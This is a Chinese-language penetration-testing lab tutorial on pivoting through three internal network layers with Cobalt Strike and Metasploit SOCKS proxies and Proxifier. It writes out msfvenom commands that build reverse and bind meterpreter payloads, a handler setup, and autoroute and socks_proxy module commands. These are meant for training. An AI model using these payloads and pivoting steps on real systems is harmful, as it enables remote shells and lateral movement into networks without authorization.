前言

代理技术：解决网络通讯不通的问题（利用跳板机建立节点后续操作） 本身网络架构不通

代理协议:SOCKS4/5

代理软件: Proxifier

实验类似这样

win7是可以出网 其余三台是出不了网 流程就是拿下win7 建立代理节点 攻击机通过代理就可以访问到11网段了 正向连接win10 建立节点 就可以访问22网段 再正向连接win2008 建立节点 就可以访问33网段了

CS

这个socks节点是建立在cs起的服务端上面的 本机与kali是通的 建立代理节点之后kali与每个虚拟机是通的 kali(cs服务端)就起的是一个流量中转的作用 (不要去想在这些虚拟机上面做了什么 越想越迷糊 知道在kali上做了socks代理后 可以通就行了)

第一层

建立代理前 去访问http://192.168.11.128/ （win10上的资产）是访问不到的

先上线win7 在cs上的win7会话上做个节点

操作：代理转发-Socks代理

在 cs的服务端(kali) 上建立个代理节点 流量会走这个端口 39037

在本机proxifier上配置一下 注意地址不是win7的 而是kali(cs服务端的地址) 本机就可以访问到11段了

第二层

访问 http://192.168.22.128/ 是访问不到的

现在是要与win2008通讯 借助win10(他俩互通 这里采用正向连接

在cs上生成一个 正连的🐎 (先添加监听器) 然后在win7的cs 会话 那去连接win10 (win10先打开一下那个🐎 等着来连接) 命令：connect ip port

然后继续在cs的win10会话上建立一个Socks代理 21781

然后再去proxifier配置 注意这里的地址 仍然是起cs服务的地址

再配置下代理规则

然后再本机上面 就可以访问

第三层

跟第二操作一样 🐎子还是正向

现在我们与win2008通讯了 现在以win2008为跳板去访问到win2012

上线 开个socks代理 配置 就可以与33网段通讯了

socks 20820

现在本机就可以直搭33网段

MSF

需要添加路由

第一层

先让win7上线

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=7788 -f exe -o q1.exe

监听。上线

添加路由

查看路由信息

run autoroute -p

添加

run post/multi/manage/autoroute (自动)

添加指定路由，1是接收的session编号 route add 192.168.11.0 255.255.255.0 1

这个时候只有msf可以与11的通讯 而其他的没有 还是要建立节点

Socks代理

这里的代理 是开在MSF服务端 而不是win7 建立了socks kali就享有了win7的流量

use auxiliary/server/socks_proxy

set srvhost 0.0.0.0

set srvport 3344

run

启用代理软件配置Sock5代理

第二层

​ 上线win10 从win7到win10 与22网段通讯

生成正向🐎

msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=6612 -f exe > rs1.exe

win10点🐎

use exploit/multi/handler

set payload windows/meterpreter/bind_tcp

set rhost 192.168.11.128

set lport 6612

run

路由

再次添加路由

先进入sessions -i 2

查看路由信息

run autoroute -p

添加

run post/multi/manage/autoroute

还是得要建立socks节点

socks

use auxiliary/server/socks_proxy

set srvhost 0.0.0.0

set srvport 3355

run

然后代理软件设置一下 就可以与22网段通讯了

第三层

与33网段通讯(win2012) 跟第二层一样的 正向连接 新建路由 建立socks 就可以与33网段通讯

总结

​ 就是一步一步来 先取得一个 再取得另外一个 在这不考虑获得权限的过程 只考虑网络互通的情况

​ socks节点是在cs msf服务端建立的 所以软件连接节点的时候的ip要注意！

后言

若做了入站策略又该怎么办呢

隧道or反向